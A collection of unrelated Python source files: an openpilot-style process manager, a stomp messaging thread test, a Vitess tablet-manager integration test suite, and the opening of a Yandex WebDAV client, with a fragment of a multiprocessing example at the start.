# q.put(1, block = False)
q.put(1)
except:
pass
def reader_proc(q):
try:
# x = q.get(block = False)
x = q.get()
print x
except:
pass
if __name__ == "__main__":
q = multiprocessing.Queue()
writer = multiprocessing.Process(target=writer_proc, args=(q,))
writer.start()
reader = multiprocessing.Process(target=reader_proc, args=(q,))
reader.start()
reader.join()
writer.join() |
manager.py | #!/usr/bin/env python3
import datetime
import os
import signal
import subprocess
import sys
import traceback
from multiprocessing import Process
from typing import List, Tuple, Union
import cereal.messaging as messaging
import selfdrive.sentry as sentry
from common.basedir import BASEDIR
from common.params import Params, ParamKeyType
from common.text_window import TextWindow
from selfdrive.boardd.set_time import set_time
from selfdrive.hardware import HARDWARE, PC, EON
from selfdrive.manager.helpers import unblock_stdout
from selfdrive.manager.process import ensure_running, launcher
from selfdrive.manager.process_config import managed_processes
from selfdrive.athena.registration import register, UNREGISTERED_DONGLE_ID
from selfdrive.swaglog import cloudlog, add_file_handler
from selfdrive.version import is_dirty, get_commit, get_version, get_origin, get_short_branch, \
terms_version, training_version
from selfdrive.hardware.eon.apk import system
sys.path.append(os.path.join(BASEDIR, "pyextra"))
def manager_init() -> None:
# update system time from panda
set_time(cloudlog)
# save boot log
#subprocess.call("./bootlog", cwd=os.path.join(BASEDIR, "selfdrive/loggerd"))
params = Params()
params.clear_all(ParamKeyType.CLEAR_ON_MANAGER_START)
default_params: List[Tuple[str, Union[str, bytes]]] = [
("CompletedTrainingVersion", "0"),
("HasAcceptedTerms", "0"),
("OpenpilotEnabledToggle", "1"),
("IsMetric", "1"),
# HKG
("UseClusterSpeed", "0"),
("LongControlEnabled", "0"),
("MadModeEnabled", "1"),
("IsLdwsCar", "0"),
("LaneChangeEnabled", "0"),
("AutoLaneChangeEnabled", "0"),
("SccSmootherSlowOnCurves", "0"),
("SccSmootherSyncGasPressed", "0"),
("StockNaviDecelEnabled", "0"),
("KeepSteeringTurnSignals", "0"),
("HapticFeedbackWhenSpeedCamera", "0"),
("DisableOpFcw", "0"),
("ShowDebugUI", "0"),
("NewRadarInterface", "0"),
("IsOpenpilotViewEnabled", "0"),
]
if not PC:
default_params.append(("LastUpdateTime", datetime.datetime.utcnow().isoformat().encode('utf8')))
if params.get_bool("RecordFrontLock"):
params.put_bool("RecordFront", True)
if not params.get_bool("DisableRadar_Allow"):
params.delete("DisableRadar")
# set unset params
for k, v in default_params:
if params.get(k) is None:
params.put(k, v)
# is this dashcam?
if os.getenv("PASSIVE") is not None:
params.put_bool("Passive", bool(int(os.getenv("PASSIVE", "0"))))
if params.get("Passive") is None:
raise Exception("Passive must be set to continue")
# Create folders needed for msgq
try:
os.mkdir("/dev/shm")
except FileExistsError:
pass
except PermissionError:
print("WARNING: failed to make /dev/shm")
# set version params
params.put("Version", get_version())
params.put("TermsVersion", terms_version)
params.put("TrainingVersion", training_version)
params.put("GitCommit", get_commit(default=""))
params.put("GitBranch", get_short_branch(default=""))
params.put("GitRemote", get_origin(default=""))
# set dongle id
reg_res = register(show_spinner=True)
if reg_res:
dongle_id = reg_res
else:
serial = params.get("HardwareSerial")
raise Exception(f"Registration failed for device {serial}")
os.environ['DONGLE_ID'] = dongle_id # Needed for swaglog
if not is_dirty():
os.environ['CLEAN'] = '1'
# init logging
sentry.init(sentry.SentryProject.SELFDRIVE)
cloudlog.bind_global(dongle_id=dongle_id, version=get_version(), dirty=is_dirty(),
device=HARDWARE.get_device_type())
def manager_prepare() -> None:
for p in managed_processes.values():
p.prepare()
def manager_cleanup() -> None:
# send signals to kill all procs
for p in managed_processes.values():
p.stop(block=False)
# ensure all are killed
for p in managed_processes.values():
p.stop(block=True)
cloudlog.info("everything is dead")
def manager_thread() -> None:
if EON:
Process(name="autoshutdownd", target=launcher, args=("selfdrive.autoshutdownd", "autoshutdownd")).start()
system("am startservice com.neokii.optool/.MainService")
Process(name="road_speed_limiter", target=launcher, args=("selfdrive.road_speed_limiter", "road_speed_limiter")).start()
cloudlog.bind(daemon="manager")
cloudlog.info("manager start")
cloudlog.info({"environ": os.environ})
params = Params()
ignore: List[str] = []
if params.get("DongleId", encoding='utf8') in (None, UNREGISTERED_DONGLE_ID):
ignore += ["manage_athenad", "uploader"]
if os.getenv("NOBOARD") is not None:
ignore.append("pandad")
ignore += [x for x in os.getenv("BLOCK", "").split(",") if len(x) > 0]
ensure_running(managed_processes.values(), started=False, not_run=ignore)
started_prev = False
sm = messaging.SubMaster(['deviceState'])
pm = messaging.PubMaster(['managerState'])
while True:
sm.update()
not_run = ignore[:]
started = sm['deviceState'].started
driverview = params.get_bool("IsDriverViewEnabled")
ensure_running(managed_processes.values(), started, driverview, not_run)
# trigger an update after going offroad
if started_prev and not started and 'updated' in managed_processes:
os.sync()
managed_processes['updated'].signal(signal.SIGHUP)
started_prev = started
running = ' '.join("%s%s\u001b[0m" % ("\u001b[32m" if p.proc.is_alive() else "\u001b[31m", p.name)
for p in managed_processes.values() if p.proc)
print(running)
cloudlog.debug(running)
# send managerState
msg = messaging.new_message('managerState')
msg.managerState.processes = [p.get_process_state_msg() for p in managed_processes.values()]
pm.send('managerState', msg)
# Exit main loop when uninstall/shutdown/reboot is needed
shutdown = False
for param in ("DoUninstall", "DoShutdown", "DoReboot"):
if params.get_bool(param):
shutdown = True
params.put("LastManagerExitReason", param)
cloudlog.warning(f"Shutting down manager - {param} set")
if shutdown:
break
def main() -> None:
prepare_only = os.getenv("PREPAREONLY") is not None
manager_init()
# Start UI early so prepare can happen in the background
if not prepare_only:
managed_processes['ui'].start()
manager_prepare()
if prepare_only:
return
# SystemExit on sigterm
signal.signal(signal.SIGTERM, lambda signum, frame: sys.exit(1))
try:
manager_thread()
except Exception:
traceback.print_exc()
sentry.capture_exception()
finally:
manager_cleanup()
params = Params()
if params.get_bool("DoUninstall"):
cloudlog.warning("uninstalling")
HARDWARE.uninstall()
elif params.get_bool("DoReboot"):
cloudlog.warning("reboot")
HARDWARE.reboot()
elif params.get_bool("DoShutdown"):
cloudlog.warning("shutdown")
HARDWARE.shutdown()
if __name__ == "__main__":
unblock_stdout()
try:
main()
except Exception:
add_file_handler(cloudlog)
cloudlog.exception("Manager failed to start")
try:
managed_processes['ui'].stop()
except Exception:
pass
# Show last 3 lines of traceback
error = traceback.format_exc(-3)
error = "Manager failed to start\n\n" + error
with TextWindow(error) as t:
t.wait_for_exit()
raise
# manual exit because we are forked
sys.exit(0)
|
threading_test.py | try:
from queue import Empty, Full, Queue
except ImportError:
from Queue import Empty, Full, Queue
import sys
import threading
import time
import unittest
import stomp
from stomp.backward import monotonic
from stomp.test.testutils import *
class MQ(object):
def __init__(self):
self.connection = stomp.Connection(get_default_host())
self.connection.set_listener('', None)
self.connection.start()
self.connection.connect('admin', 'password', wait=True)
def send(self, topic, msg, persistent='true', retry=False):
self.connection.send(destination="/topic/%s" % topic, body=msg,
persistent=persistent)
mq = MQ()
class TestThreading(unittest.TestCase):
def setUp(self):
"""Test that mq sends don't wedge their threads.
Starts a number of sender threads, and runs for a set amount of
time. Each thread sends messages as fast as it can, and after each
send, pops from a Queue. Meanwhile, the Queue is filled with one
marker per second. If the Queue fills, the test fails, as that
indicates that all threads are no longer emptying the queue, and thus
must be wedged in their send() calls.
"""
self.Q = Queue(10)
self.Cmd = Queue()
self.Error = Queue()
self.clients = 20
self.threads = []
self.runfor = 20
for i in range(0, self.clients):
t = threading.Thread(name="client %s" % i,
target=self.make_sender(i))
t.setDaemon(1)
self.threads.append(t)
def tearDown(self):
for t in self.threads:
if not t.isAlive:
print("thread", t, "died")
self.Cmd.put('stop')
for t in self.threads:
t.join()
print()
print()
errs = []
while 1:
try:
errs.append(self.Error.get(block=False))
except Empty:
break
print("Dead threads:", len(errs), "of", self.clients)
etype = {}
for ec, _, _ in errs:
if ec in etype:
etype[ec] += 1
else:
etype[ec] = 1
for k in sorted(etype.keys()):
print("%s: %s" % (k, etype[k]))
mq.connection.disconnect()
def make_sender(self, i):
Q = self.Q
Cmd = self.Cmd
Error = self.Error
def send(i=i, Q=Q, Cmd=Cmd, Error=Error):
counter = 0
print("%s starting" % i)
try:
while 1:
# print "%s sending %s" % (i, counter)
try:
mq.send('testclientwedge',
'Message %s:%s' % (i, counter))
except:
Error.put(sys.exc_info())
# thread will die
raise
else:
# print "%s sent %s" % (i, counter)
try:
Q.get(block=False)
except Empty:
pass
try:
if Cmd.get(block=False):
break
except Empty:
pass
counter += 1
finally:
print("final", i, counter)
return send
def test_threads_dont_wedge(self):
for t in self.threads:
t.start()
start = monotonic()
while monotonic() - start < self.runfor:
try:
self.Q.put(1, False)
time.sleep(1.0)
except Full:
assert False, "Failed: 'request' queue filled up"
print("passed")
|
tabletmanager.py | #!/usr/bin/python
import warnings
# Dropping a table inexplicably produces a warning despite
# the "IF EXISTS" clause. Squelch these warnings.
warnings.simplefilter("ignore")
import logging
import os
import signal
from subprocess import PIPE
import threading
import time
import unittest
import urllib
import environment
import utils
import tablet
from vtdb import dbexceptions
from vtdb import vtgate
tablet_62344 = tablet.Tablet(62344)
tablet_62044 = tablet.Tablet(62044)
def setUpModule():
try:
if environment.topo_server_implementation == 'zookeeper':
# this is a one-off test to make sure our zookeeper implementation
# behaves with a server that is not DNS-resolveable
environment.topo_server_setup(add_bad_host=True)
else:
environment.topo_server_setup()
# start mysql instance external to the test
setup_procs = [
tablet_62344.init_mysql(),
tablet_62044.init_mysql(),
]
utils.Vtctld().start()
utils.wait_procs(setup_procs)
except:
tearDownModule()
raise
def tearDownModule():
if utils.options.skip_teardown:
return
teardown_procs = [
tablet_62344.teardown_mysql(),
tablet_62044.teardown_mysql(),
]
utils.wait_procs(teardown_procs, raise_on_error=False)
environment.topo_server_teardown()
utils.kill_sub_processes()
utils.remove_tmp_files()
tablet_62344.remove_tree()
tablet_62044.remove_tree()
class TestTabletManager(unittest.TestCase):
def tearDown(self):
tablet.Tablet.check_vttablet_count()
environment.topo_server_wipe()
for t in [tablet_62344, tablet_62044]:
t.reset_replication()
t.clean_dbs()
# run twice to check behavior with existing znode data
def test_sanity(self):
self._test_sanity()
self._test_sanity()
def _test_sanity(self):
# Start up a master mysql and vttablet
utils.run_vtctl(['CreateKeyspace', '-force', 'test_keyspace'])
utils.run_vtctl(['createshard', '-force', 'test_keyspace/0'])
tablet_62344.init_tablet('master', 'test_keyspace', '0', parent=False)
utils.run_vtctl(['RebuildKeyspaceGraph', 'test_keyspace'])
utils.validate_topology()
srvShard = utils.run_vtctl_json(['GetSrvShard', 'test_nj', 'test_keyspace/0'])
self.assertEqual(srvShard['MasterCell'], 'test_nj')
# if these statements don't run before the tablet it will wedge waiting for the
# db to become accessible. this is more a bug than a feature.
tablet_62344.populate('vt_test_keyspace', self._create_vt_select_test,
self._populate_vt_select_test)
tablet_62344.start_vttablet()
# make sure the query service is started right away
result, _ = utils.run_vtctl(['Query', 'test_nj', 'test_keyspace',
'select * from vt_select_test'],
mode=utils.VTCTL_VTCTL, trap_output=True)
rows = result.splitlines()
self.assertEqual(len(rows), 5, "expected 5 rows in vt_select_test: %s %s" % (str(rows), result))
# make sure direct dba queries work
query_result = utils.run_vtctl_json(['ExecuteFetch', '-want_fields', tablet_62344.tablet_alias, 'select * from vt_test_keyspace.vt_select_test'])
self.assertEqual(len(query_result['Rows']), 4, "expected 4 rows in vt_select_test: %s" % str(query_result))
self.assertEqual(len(query_result['Fields']), 2, "expected 2 fields in vt_select_test: %s" % str(query_result))
# check Pings
utils.run_vtctl(['Ping', tablet_62344.tablet_alias])
utils.run_vtctl(['RpcPing', tablet_62344.tablet_alias])
# Quickly check basic actions.
utils.run_vtctl(['SetReadOnly', tablet_62344.tablet_alias])
utils.wait_db_read_only(62344)
utils.run_vtctl(['SetReadWrite', tablet_62344.tablet_alias])
utils.check_db_read_write(62344)
utils.run_vtctl(['DemoteMaster', tablet_62344.tablet_alias])
utils.wait_db_read_only(62344)
utils.validate_topology()
utils.run_vtctl(['ValidateKeyspace', 'test_keyspace'])
# not pinging tablets, as it enables replication checks, and they
# break because we only have a single master, no slaves
utils.run_vtctl(['ValidateShard', '-ping-tablets=false', 'test_keyspace/0'])
srvShard = utils.run_vtctl_json(['GetSrvShard', 'test_nj', 'test_keyspace/0'])
self.assertEqual(srvShard['MasterCell'], 'test_nj')
tablet_62344.kill_vttablet()
tablet_62344.init_tablet('idle')
tablet_62344.scrap(force=True)
def test_vtgate(self):
# Start up a master mysql and vttablet
utils.run_vtctl(['CreateKeyspace', 'test_keyspace'])
utils.run_vtctl(['CreateShard', 'test_keyspace/0'])
tablet_62344.init_tablet('master', 'test_keyspace', '0', parent=False)
utils.run_vtctl(['RebuildKeyspaceGraph', 'test_keyspace'])
utils.validate_topology()
srvShard = utils.run_vtctl_json(['GetSrvShard', 'test_nj',
'test_keyspace/0'])
self.assertEqual(srvShard['MasterCell'], 'test_nj')
# if these statements don't run before the tablet it will wedge waiting for the
# db to become accessible. this is more a bug than a feature.
tablet_62344.mquery("", ["set global read_only = off"])
tablet_62344.populate('vt_test_keyspace', self._create_vt_select_test,
self._populate_vt_select_test)
tablet_62344.start_vttablet()
gate_proc, gate_port = utils.vtgate_start()
conn = vtgate.connect("localhost:%s"%(gate_port), "master", "test_keyspace",
"0", 2.0)
# _execute
(result, count, lastrow, fields) = conn._execute("select * from vt_select_test", {})
self.assertEqual(count, 4, "want 4, got %d" % (count))
self.assertEqual(len(fields), 2, "want 2, got %d" % (len(fields)))
# _execute_batch
queries = [
"select * from vt_select_test where id = :id",
"select * from vt_select_test where id = :id",
]
bindvars = [
{"id": 1},
{"id": 2},
]
rowsets = conn._execute_batch(queries, bindvars)
self.assertEqual(rowsets[0][0][0][0], 1)
self.assertEqual(rowsets[1][0][0][0], 2)
# _stream_execute
(result, count, lastrow, fields) = conn._stream_execute("select * from vt_select_test", {})
self.assertEqual(len(fields), 2, "want 2, got %d" % (len(fields)))
count = 0
while 1:
r = conn._stream_next()
if not r:
break
count += 1
self.assertEqual(count, 4, "want 4, got %d" % (count))
# begin-rollback
conn.begin()
conn._execute("insert into vt_select_test values(:id, :msg)", {"id": 5, "msg": "test4"})
conn.rollback()
(result, count, lastrow, fields) = conn._execute("select * from vt_select_test", {})
self.assertEqual(count, 4, "want 4, got %d" % (count))
# begin-commit
conn.begin()
conn._execute("insert into vt_select_test values(:id, :msg)", {"id": 5, "msg": "test4"})
conn.commit()
(result, count, lastrow, fields) = conn._execute("select * from vt_select_test", {})
self.assertEqual(count, 5, "want 5, got %d" % (count))
# error on dml. We still need to get a transaction id
conn.begin()
with self.assertRaises(dbexceptions.IntegrityError):
conn._execute("insert into vt_select_test values(:id, :msg)", {"id": 5, "msg": "test4"})
self.assertTrue(conn.session["ShardSessions"][0]["TransactionId"] != 0)
conn.commit()
# interleaving
conn2 = vtgate.connect("localhost:%s"%(gate_port), "master",
"test_keyspace", "0", 2.0)
thd = threading.Thread(target=self._query_lots, args=(conn2,))
thd.start()
for i in xrange(250):
(result, count, lastrow, fields) = conn._execute("select id from vt_select_test where id = 2", {})
self.assertEqual(result, [(2,)])
if i % 10 == 0:
conn._stream_execute("select id from vt_select_test where id = 3", {})
while 1:
result = conn._stream_next()
if not result:
break
self.assertEqual(result, (3,))
thd.join()
# close
conn.close()
utils.vtgate_kill(gate_proc)
tablet_62344.kill_vttablet()
def _query_lots(self, conn2):
for i in xrange(500):
(result, count, lastrow, fields) = conn2._execute("select id from vt_select_test where id = 1", {})
self.assertEqual(result, [(1,)])
def test_scrap(self):
# Start up a master mysql and vttablet
utils.run_vtctl(['CreateKeyspace', 'test_keyspace'])
tablet_62344.init_tablet('master', 'test_keyspace', '0')
tablet_62044.init_tablet('replica', 'test_keyspace', '0')
utils.run_vtctl(['RebuildShardGraph', 'test_keyspace/*'])
utils.validate_topology()
srvShard = utils.run_vtctl_json(['GetSrvShard', 'test_nj',
'test_keyspace/0'])
self.assertEqual(srvShard['MasterCell'], 'test_nj')
tablet_62044.scrap(force=True)
utils.validate_topology()
srvShard = utils.run_vtctl_json(['GetSrvShard', 'test_nj',
'test_keyspace/0'])
self.assertEqual(srvShard['MasterCell'], 'test_nj')
_create_vt_select_test = '''create table vt_select_test (
id bigint auto_increment,
msg varchar(64),
primary key (id)
) Engine=InnoDB'''
_populate_vt_select_test = [
"insert into vt_select_test (msg) values ('test %s')" % x
for x in xrange(4)]
def test_restart_during_action(self):
# Start up a master mysql and vttablet
utils.run_vtctl(['CreateKeyspace', 'test_keyspace'])
tablet_62344.init_tablet('master', 'test_keyspace', '0')
utils.run_vtctl(['RebuildShardGraph', 'test_keyspace/0'])
utils.validate_topology()
srvShard = utils.run_vtctl_json(['GetSrvShard', 'test_nj',
'test_keyspace/0'])
self.assertEqual(srvShard['MasterCell'], 'test_nj')
tablet_62344.create_db('vt_test_keyspace')
tablet_62344.start_vttablet()
utils.run_vtctl(['Ping', tablet_62344.tablet_alias])
# schedule long action
utils.run_vtctl(['-no-wait', 'Sleep', tablet_62344.tablet_alias, '15s'],
mode=utils.VTCTL_VTCTL, stdout=utils.devnull)
# ping blocks until the sleep finishes unless we have a schedule race
action_path, _ = utils.run_vtctl(['-no-wait', 'Ping',
tablet_62344.tablet_alias],
mode=utils.VTCTL_VTCTL, trap_output=True)
action_path = action_path.strip()
# kill agent leaving vtaction running
tablet_62344.kill_vttablet()
# restart agent
tablet_62344.start_vttablet()
# we expect this action with a short wait time to fail. this isn't the best
# and has some potential for flakiness.
utils.run_vtctl(['-wait-time', '2s', 'WaitForAction', action_path],
mode=utils.VTCTL_VTCTL, expect_fail=True)
# wait until the background sleep action is done, otherwise there will be
# a leftover vtaction whose result may overwrite running actions
# NOTE(alainjobart): Yes, I've seen it happen, it's a pain to debug:
# the zombie Sleep clobbers the Clone command in the following tests
utils.run_vtctl(['-wait-time', '20s', 'WaitForAction', action_path],
mode=utils.VTCTL_VTCTL, auto_log=True)
if environment.topo_server_implementation == 'zookeeper':
# extra small test: we ran for a while, get the states we were in,
# make sure they're accounted for properly
# first the query engine States
v = utils.get_vars(tablet_62344.port)
logging.debug("vars: %s" % str(v))
# then the Zookeeper connections
if v['ZkMetaConn']['test_nj']['Current'] != 'Connected':
self.fail('invalid zk test_nj state: %s' %
v['ZkMetaConn']['test_nj']['Current'])
if v['ZkMetaConn']['global']['Current'] != 'Connected':
self.fail('invalid zk global state: %s' %
v['ZkMetaConn']['global']['Current'])
if v['ZkMetaConn']['test_nj']['DurationConnected'] < 10e9:
self.fail('not enough time in Connected state: %u',
v['ZkMetaConn']['test_nj']['DurationConnected'])
if v['TabletType'] != 'master':
self.fail('TabletType not exported correctly')
tablet_62344.kill_vttablet()
def test_vttablet_authenticated(self):
utils.run_vtctl(['CreateKeyspace', 'test_keyspace'])
tablet_62344.init_tablet('master', 'test_keyspace', '0')
utils.run_vtctl(['RebuildShardGraph', 'test_keyspace/0'])
utils.validate_topology()
srvShard = utils.run_vtctl_json(['GetSrvShard', 'test_nj', 'test_keyspace/0'])
self.assertEqual(srvShard['MasterCell'], 'test_nj')
tablet_62344.populate('vt_test_keyspace', self._create_vt_select_test,
self._populate_vt_select_test)
tablet_62344.start_vttablet(auth=True)
utils.run_vtctl(['SetReadWrite', tablet_62344.tablet_alias])
out, err = tablet_62344.vquery('select * from vt_select_test',
path='test_keyspace/0', verbose=True,
user='ala', password=r'ma kota')
logging.debug("Got rows: " + err)
if 'Row count: 4' not in err:
self.fail("query didn't go through: %s, %s" % (err, out))
tablet_62344.kill_vttablet()
# TODO(szopa): Test that non-authenticated queries do not pass
# through (when we get to that point).
def _check_string_in_hook_result(self, text, expected):
if isinstance(expected, basestring):
expected = [expected]
for exp in expected:
if exp in text:
return
logging.warning("ExecuteHook output:\n%s", text)
self.fail("ExecuteHook returned unexpected result, no string: '" + "', '".join(expected) + "'")
def _run_hook(self, params, expectedStrings):
out, err = utils.run_vtctl(['--alsologtostderr', 'ExecuteHook',
tablet_62344.tablet_alias] + params,
mode=utils.VTCTL_VTCTL, trap_output=True,
raise_on_error=False)
for expected in expectedStrings:
self._check_string_in_hook_result(err, expected)
def test_hook(self):
utils.run_vtctl(['CreateKeyspace', 'test_keyspace'])
# create the database so vttablets start, as it is serving
tablet_62344.create_db('vt_test_keyspace')
tablet_62344.init_tablet('master', 'test_keyspace', '0', start=True)
# test a regular program works
self._run_hook(['test.sh', '--flag1', '--param1=hello'], [
'"ExitStatus": 0',
['"Stdout": "TABLET_ALIAS: test_nj-0000062344\\nPARAM: --flag1\\nPARAM: --param1=hello\\n"',
'"Stdout": "TABLET_ALIAS: test_nj-0000062344\\nPARAM: --param1=hello\\nPARAM: --flag1\\n"',
],
'"Stderr": ""',
])
# test stderr output
self._run_hook(['test.sh', '--to-stderr'], [
'"ExitStatus": 0',
'"Stdout": "TABLET_ALIAS: test_nj-0000062344\\nPARAM: --to-stderr\\n"',
'"Stderr": "ERR: --to-stderr\\n"',
])
# test commands that fail
self._run_hook(['test.sh', '--exit-error'], [
'"ExitStatus": 1',
'"Stdout": "TABLET_ALIAS: test_nj-0000062344\\nPARAM: --exit-error\\n"',
'"Stderr": "ERROR: exit status 1\\n"',
])
# test hook that is not present
self._run_hook(['not_here.sh'], [
'"ExitStatus": -1',
'"Stdout": "Skipping missing hook: /', # cannot go further, local path
'"Stderr": ""',
])
# test hook with invalid name
self._run_hook(['/bin/ls'], [
"action failed: ExecuteHook hook name cannot have a '/' in it",
])
tablet_62344.kill_vttablet()
def test_sigterm(self):
utils.run_vtctl(['CreateKeyspace', 'test_keyspace'])
# create the database so vttablets start, as it is serving
tablet_62344.create_db('vt_test_keyspace')
tablet_62344.init_tablet('master', 'test_keyspace', '0', start=True)
# start a 'vtctl Sleep' command, don't wait for it
action_path, _ = utils.run_vtctl(['-no-wait', 'Sleep',
tablet_62344.tablet_alias, '60s'],
mode=utils.VTCTL_VTCTL, trap_output=True)
action_path = action_path.strip()
# wait for the action to be 'Running', capture its pid
timeout = 10
while True:
an = utils.run_vtctl_json(['ReadTabletAction', action_path])
if an.get('State', None) == 'Running':
pid = an['Pid']
logging.debug("Action is running with pid %u, good", pid)
break
timeout = utils.wait_step('sleep action to run', timeout)
# let's kill the vtaction process with a regular SIGTERM
os.kill(pid, signal.SIGTERM)
# check the vtctl command got the right remote error back
out, err = utils.run_vtctl(['WaitForAction', action_path], trap_output=True,
mode=utils.VTCTL_VTCTL, raise_on_error=False)
if "vtaction interrupted by signal" not in err:
self.fail("cannot find expected output in error: " + err)
logging.debug("vtaction was interrupted correctly:\n" + err)
tablet_62344.kill_vttablet()
# test_vtaction_dies_hard makes sure that the recovery code works
# properly when action dies hard (with a crash for instance)
def test_vtaction_dies_hard(self):
utils.run_vtctl(['CreateKeyspace', 'test_keyspace'])
# create the database so vttablets start, as it is serving
tablet_62344.create_db('vt_test_keyspace')
tablet_62344.init_tablet('master', 'test_keyspace', '0', start=True)
# start a 'vtctl Sleep' command, don't wait for it
action_path, _ = utils.run_vtctl(['-no-wait', 'Sleep',
tablet_62344.tablet_alias, '60s'],
mode=utils.VTCTL_VTCTL, trap_output=True)
action_path = action_path.strip()
# wait for the action to be 'Running', capture its pid
timeout = 10
while True:
an = utils.run_vtctl_json(['ReadTabletAction', action_path])
if an.get('State', None) == 'Running':
pid = an['Pid']
logging.debug("Action is running with pid %u, good", pid)
break
timeout = utils.wait_step('sleep action to run', timeout)
# let's kill it hard, wait until it's gone for good
os.kill(pid, signal.SIGKILL)
try:
os.waitpid(pid, 0)
except OSError:
# this means the process doesn't exist any more, we're good
pass
# Then let's make sure the next action cleans up properly and can execute.
# If that doesn't work, this will time out and the test will fail.
utils.run_vtctl(['Ping', tablet_62344.tablet_alias])
tablet_62344.kill_vttablet()
def test_restart(self):
utils.run_vtctl(['CreateKeyspace', 'test_keyspace'])
# create the database so vttablets start, as it is serving
tablet_62344.create_db('vt_test_keyspace')
tablet_62344.init_tablet('master', 'test_keyspace', '0')
proc1 = tablet_62344.start_vttablet()
proc2 = tablet_62344.start_vttablet()
for timeout in xrange(20):
logging.debug("Sleeping waiting for first process to die")
time.sleep(1.0)
proc1.poll()
if proc1.returncode is not None:
break
if proc1.returncode is None:
self.fail("proc1 still running")
tablet_62344.kill_vttablet()
def test_scrap_and_reinit(self):
utils.run_vtctl(['CreateKeyspace', 'test_keyspace'])
tablet_62344.create_db('vt_test_keyspace')
tablet_62044.create_db('vt_test_keyspace')
# one master one replica
tablet_62344.init_tablet('master', 'test_keyspace', '0')
tablet_62044.init_tablet('replica', 'test_keyspace', '0')
# make sure the replica is in the replication graph
before_scrap = utils.run_vtctl_json(['GetShardReplication', 'test_nj',
'test_keyspace/0'])
self.assertEqual(1, len(before_scrap['ReplicationLinks']), 'wrong replication links before: %s' % str(before_scrap))
# scrap and re-init
utils.run_vtctl(['ScrapTablet', '-force', tablet_62044.tablet_alias])
tablet_62044.init_tablet('replica', 'test_keyspace', '0')
after_scrap = utils.run_vtctl_json(['GetShardReplication', 'test_nj',
'test_keyspace/0'])
self.assertEqual(1, len(after_scrap['ReplicationLinks']), 'wrong replication links after: %s' % str(after_scrap))
# manually add a bogus entry to the replication graph, and check
# it is removed by ShardReplicationFix
utils.run_vtctl(['ShardReplicationAdd', 'test_keyspace/0',
'test_nj-0000066666', 'test_nj-0000062344'], auto_log=True)
with_bogus = utils.run_vtctl_json(['GetShardReplication', 'test_nj',
'test_keyspace/0'])
self.assertEqual(2, len(with_bogus['ReplicationLinks']),
'wrong replication links with bogus: %s' % str(with_bogus))
utils.run_vtctl(['ShardReplicationFix', 'test_nj', 'test_keyspace/0'],
auto_log=True)
after_fix = utils.run_vtctl_json(['GetShardReplication', 'test_nj',
'test_keyspace/0'])
self.assertEqual(1, len(after_scrap['ReplicationLinks']),
'wrong replication links after fix: %s' % str(after_fix))
def test_health_check(self):
utils.run_vtctl(['CreateKeyspace', 'test_keyspace'])
# one master, one replica that starts in spare
tablet_62344.init_tablet('master', 'test_keyspace', '0')
tablet_62044.init_tablet('spare', 'test_keyspace', '0')
for t in tablet_62344, tablet_62044:
t.create_db('vt_test_keyspace')
tablet_62344.start_vttablet(wait_for_state=None, target_tablet_type='replica')
tablet_62044.start_vttablet(wait_for_state=None, target_tablet_type='replica', lameduck_period='5s')
tablet_62344.wait_for_vttablet_state('SERVING')
tablet_62044.wait_for_vttablet_state('NOT_SERVING')
utils.run_vtctl(['ReparentShard', '-force', 'test_keyspace/0',
tablet_62344.tablet_alias])
# make sure the 'spare' slave goes to 'replica'
timeout = 10
while True:
ti = utils.run_vtctl_json(['GetTablet', tablet_62044.tablet_alias])
if ti['Type'] == "replica":
logging.debug("Slave tablet went to replica, good")
break
timeout = utils.wait_step('slave tablet going to replica', timeout)
# make sure the master is still master
ti = utils.run_vtctl_json(['GetTablet', tablet_62344.tablet_alias])
self.assertEqual(ti['Type'], 'master', "unexpected master type: %s" % ti['Type'])
# stop replication on the slave, see it trigger the slave going
# slightly unhealthy
tablet_62044.mquery('', 'stop slave')
timeout = 10
while True:
ti = utils.run_vtctl_json(['GetTablet', tablet_62044.tablet_alias])
if 'Health' in ti and ti['Health']:
if 'replication_lag' in ti['Health']:
if ti['Health']['replication_lag'] == 'high':
logging.debug("Slave tablet replication_lag went to high, good")
break
timeout = utils.wait_step('slave has high replication lag', timeout)
# make sure the serving graph was updated
ep = utils.run_vtctl_json(['GetEndPoints', 'test_nj', 'test_keyspace/0', 'replica'])
if not ep['entries'][0]['health']:
self.fail('Replication lag parameter not propagated to serving graph: %s' % str(ep))
self.assertEqual(ep['entries'][0]['health']['replication_lag'], 'high', 'Replication lag parameter not propagated to serving graph: %s' % str(ep))
# make sure status web page is unhappy
self.assertIn('>unhappy</span></div>', tablet_62044.get_status())
# make sure the vars is updated
v = utils.get_vars(tablet_62044.port)
self.assertEqual(v['LastHealthMapCount'], 1)
# then restart replication, make sure we go back to healthy
tablet_62044.mquery('', 'start slave')
timeout = 10
while True:
ti = utils.run_vtctl_json(['GetTablet', tablet_62044.tablet_alias])
if 'Health' in ti and ti['Health']:
if 'replication_lag' in ti['Health']:
if ti['Health']['replication_lag'] == 'high':
timeout = utils.wait_step('slave has no replication lag', timeout)
continue
logging.debug("Slave tablet replication_lag is gone, good")
break
# make sure status web page is healthy
self.assertIn('>healthy</span></div>', tablet_62044.get_status())
# make sure the vars is updated
v = utils.get_vars(tablet_62044.port)
self.assertEqual(v['LastHealthMapCount'], 0)
# kill the tablets
tablet.kill_tablets([tablet_62344, tablet_62044])
# the replica was in lameduck for 5 seconds, should have been enough
# to reset its state to spare
ti = utils.run_vtctl_json(['GetTablet', tablet_62044.tablet_alias])
self.assertEqual(ti['Type'], 'spare', "tablet didn't go to spare while in lameduck mode: %s" % str(ti))
def test_fallback_policy(self):
tablet_62344.create_db('vt_test_keyspace')
tablet_62344.init_tablet('master', 'test_keyspace', '0')
proc1 = tablet_62344.start_vttablet(security_policy="bogus")
f = urllib.urlopen('http://localhost:%u/queryz' % int(tablet_62344.port))
response = f.read()
f.close()
self.assertIn('not allowed', response)
tablet_62344.kill_vttablet()
if __name__ == '__main__':
utils.main()
|
yandexwebdav.py | #!/usr/bin/python
# coding=utf-8
import os
import sys
import threading
import logging
import base64
import xml.dom.minidom
from six.moves import queue
from six.moves import http_client
from six import u, b, PY3
if PY3:
from urllib.parse import unquote, quote
else:
from urllib import unquote, quote
logger = logging.getLogger("yandexwebdav.py")
TRYINGS = 3
def _encode_utf8(txt):
if not PY3:
if type(txt) == unicode:
return txt.encode("utf-8")
return txt
def _decode_utf8(txt):
if PY3:
if type(txt) is str:
return txt
return txt.decode("utf-8")
def _(path):
"""
Normalize path to unicode
:param path: path
:return: normalize path
>>> _(None)
u''
>>> _(u("test1"))
u'test1'
>>> _("test2")
u'test2'
"""
if path is None:
return u("")
if not PY3:
